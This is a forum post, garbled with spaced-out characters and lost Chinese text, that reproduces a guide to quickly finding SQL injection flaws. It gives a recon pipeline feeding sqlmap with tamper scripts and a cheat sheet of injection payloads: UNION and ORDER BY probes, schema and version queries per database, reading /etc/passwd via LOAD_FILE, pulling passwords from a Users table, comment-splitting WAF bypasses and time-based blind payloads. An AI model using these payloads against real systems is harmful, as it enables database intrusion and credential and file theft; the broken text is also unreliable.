搜索

[20656] 2021-07-29_快速发现SQL注入漏洞技巧

文档创建者:s7ckTeam
浏览次数:16
最后更新:2025-01-18
2021-07-29_快速发现SQL注入漏洞技巧 S Q L   x h a n 1 x / K a t h a n P 1 9   K h a n   2 0 2 1 - 0 7 - 2 9 1 .   使 使   B u r p s u i t e 2 .   使 使   w a y b a c k u r l s   3 . 使 使     1 .   C a p t u r e   t h e   r e q u e s t   u s i n g   b u r p s u i t e .     2 .   S e n d   t h e   r e q u e s t   t o   b u r p   s c a n n e r .     3 .   P r o c e e d   w i t h   a c t i v e   s c a n .     4 .   O n c e   t h e   s c a n   i s   f i n i s h e d ,   l o o k   f o r   S Q L   v u l n e r a b i l i t y   t h a t   h a s   b e e n   d e t e c t e d .     5 .   M a n u a l l y   t r y   S Q L   i n j e c t i o n   p a y l o a d s .     6 .   U s e   S Q L M A P   t o   s p e e d   u p   t h e   p r o c e s s .     1 .   s u b l i s t 3 r   - d   t a r g e t   |   t e e   - a   d o m a i n s   ( y o u   c a n   u s e   o t h e r   t o o l s   l i k e   f i n d o m a i n ,   a s s e t f i n d e r ,   e t c . )     2 .   c a t   d o m a i n s   |   h t t p x   |   t e e   - a   a l i v e     3 .   c a t   a l i v e   |   w a y b a c k u r l s   |   t e e   - a   u r l s     4 .   g f   s q l i   u r l s   > >   s q l i     5 .   s q l m a p   - m   s q l i   - - d b s   - - b a t c h     6 .   u s e   t a m p e r   s c r i p t s     1 .   U s e   s u b d o m a i n   e n u m e r a t i o n   t o o l s   o n   t h e   d o m a i n .     2 .   G a t h e r   a l l   u r l s   u s i n g   h a k c r a w l e r ,   w a y b a c k u r l s ,   g a u   f o r   t h e   d o m a i n   a n d   s u b d o m a i n s .     3 .   Y o u   c a n   u s e   t h e   s a m e   m e t h o d   d e s c r i b e d   a b o v e   i n   2 n d   p o i n t .     4 .   U s e   A r j u n   t o   s c a n   f o r   t h e   h i d d e n   p a r a m s   i n   t h e   u r l s .       5 .   U s e   - - u r l s   f l a g   t o   i n c l u d e   a l l   u r l s .     6 .   C h e c k   t h e   p a r a m s   a s   h t t p s : / / d o m a i n . c o m ? < h i d d e n p a r a m > = < v a l u e >     7 .   S e n d   r e q u e s t   t o   f i l e   a n d   p r o c e s s   i t   t h r o u g h   s q l m a p .
4 .   使 使 5 . 使 使   o r d e r   b y     g r o u p   b y   6 . 使 使 7 . 使 使   c o n c a t ( )     g r o u p _ c o n c a t ( )     d a t a b a s e ( ) v e r s i o n ( ) u s e r ( ) U U I D ( )   1 .   2 .       1 .   S u b m i t   s i n g l e   q u o t e   c h a r a c t e r   '   &   l o o k   f o r   e r r o r s .     2 .   S u b m i t   S Q L   s p e c i f i c   q u e r y .     3 .   S u b m i t   B o o l e a n   c o n d i t i o n s   s u c h   a s   o r   1 = 1   a n d   o r   1 = 0 ,   a n d   l o o k i n g   a p p l i c a t i o n ' s   r e s p o n s e .     4 .   S u b m i t   c e r t a i n   p a y l o a d s   t h a t   r e s u l t s   i n   t i m e   d e l a y .     S u b m i t   a   s e r i e s   o f   O R D E R   B Y   c l a u s e   s u c h   a s                   '   O R D E R   B Y   1   - -         '   O R D E R   B Y   2   - -         '   O R D E R   B Y   3   - -                 a n d   i n c r e m e n t i n g   s p e c i f i e d   c o l u m n   i n d e x   u n t i l   a n   e r r o r   o c c u r s .     S u b m i t   a   s e r i e s   o f   U N I O N   S E L E C T   p a y l o a d s .             '   U N I O N   S E L E C T   N U L L   - -         '   U N I O N   S E L E C T   N U L L ,   N U L L   - -         '   U N I O N   S E L E C T   N U L L ,   N U L L ,   N U L L   - -             ( U s i n g   N U L L   m a x i m i z e s   t h e   p r o b a b i l i t y   t h a t   t h e   p a y l o a d   w i l l   s u c c e e d .   N U L L   c a n   b e   c o n v e r t e d   t o   e v e r y   c o m m o n l y   u s e d   d a t a   t y p e . )         O r a c l e                   S E L E C T   b a n n e r   F R O M   v $ v e r s i o n                                   S E L E C T   v e r s i o n   F R O M   v $ i n s t a n c e         M i c r o s o f t                   S E L E C T   @ @ v e r s i o n         P o s t g r e S Q L                   S E L E C T   v e r s i o n ( )         M y S Q L                   S E L E C T   @ @ v e r s i o n         O r a c l e                 S E L E C T   *   F R O M   a l l _ t a b l e s                         S E L E C T   *   F R O M   a l l _ t a b _ c o l u m n s   W H E R E   t a b l e _ n a m e   =   ' T A B L E - N A M E - H E R E '                 M i c r o s o f t           S E L E C T   *   F R O M   i n f o r m a t i o n _ s c h e m a . t a b l e s                                     S E L E C T   *   F R O M   i n f o r m a t i o n _ s c h e m a . c o l u m n s   W H E R E   t a b l e _ n a m e   =   ' T A B L E - N A M E - H E R E '                 P o s t g r e S Q L           S E L E C T   *   F R O M   i n f o r m a t i o n _ s c h e m a . t a b l e s                                     S E L E C T   *   F R O M   i n f o r m a t i o n _ s c h e m a . c o l u m n s   W H E R E   t a b l e _ n a m e   =   ' T A B L E - N A M E - H E R E '         M y S Q L                   S E L E C T   *   F R O M   i n f o r m a t i o n _ s c h e m a . t a b l e s                                     S E L E C T   *   F R O M   i n f o r m a t i o n _ s c h e m a . c o l u m n s   W H E R E   t a b l e _ n a m e   =   ' T A B L E - N A M E - H E R E '
3 .   4 . 使 使 g r o u p _ c o n c a t ( ) 8 .   使 使 l o a d _ f i l e ( )   访 访 9 . W A F 1 .     S Q L   使 使   N u l l   2 . 使 使 S Q L 3 . 4 .   / 5 .   使 使   S Q L M A P     W A F / I D S / I P S 6 .   7 .   '   A N D   1 = 2   U N I O N   A L L   S E L E C T   c o n c a t _ w s ( 0 x 3 a , v e r s i o n ( ) , u s e r ( ) , d a t a b a s e ( ) ) '   u n i o n   a l l   s e l e c t   1 , 2 , 3 , g r o u p _ c o n c a t ( t a b l e _ n a m e ) , 5 , 6   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = d a t a b a s e ( ) '   U N I O N   A L L   S E L E C T   L O A D _ F I L E   ( ' /   e t c   /   p a s s w d ' )         % 0 0 '   U N I O N   S E L E C T   p a s s w o r d   F R O M   U s e r s   W H E R E   u s e r n a m e - ' x y z ' - -   ' / * * / U N / * * / I O N / * * / S E L / * * / E C T / * * / p a s s w o r d / * * / F R / O M / * * / U s e r s / * * / W H E / * * / R E / * * / u s e r n a m e / * * / L I K E / * * / ' x y z ' - -         f o r   e x a m p l e   :         /   U R L   e n c o d e d   t o   % 2 f         *   U R L   e n c o d e d   t o   % 2 a         C a n   a l s o   u s e   d o u b l e   e n c o d i n g ,   i f   s i n g l e   e n c o d i n g   d o e s n ' t   w o r k s .   U s e   h e x   e n c o d i n g   i f   t h e   r e s t   d o e s n ' t   w o r k .             O r a c l e                   d b m s _ p i p e . r e c e i v e _ m e s s a g e ( ( ' a ' ) , 1 0 )                         M i c r o s o f t           W A I T F O R   D E L A Y   ' 0 : 0 : 1 0 '                         P o s t g r e S Q L           S E L E C T   p g _ s l e e p ( 1 0 )                         M y S Q L                   S E L E C T   s l e e p ( 1 0 )             O r a c l e                   S E L E C T   C A S E   W H E N   ( Y O U R - C O N D I T I O N - H E R E )   T H E N   ' a ' | | d b m s _ p i p e . r e c e i v e _ m e s s a g e ( ( ' a ' ) , 1 0 )   E L S E   N U L L   E N D   F R O M   d u a l            
                        M i c r o s o f t           I F   ( Y O U R - C O N D I T I O N - H E R E )   W A I T F O R   D E L A Y   ' 0 : 0 : 1 0 '                         P o s t g r e S Q L           S E L E C T   C A S E   W H E N   ( Y O U R - C O N D I T I O N - H E R E )   T H E N   p g _ s l e e p ( 1 0 )   E L S E   p g _ s l e e p ( 0 )   E N D                         M y S Q L                   S E L E C T   I F ( Y O U R - C O N D I T I O N - H E R E , s l e e p ( 1 0 ) , ' a ' )
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理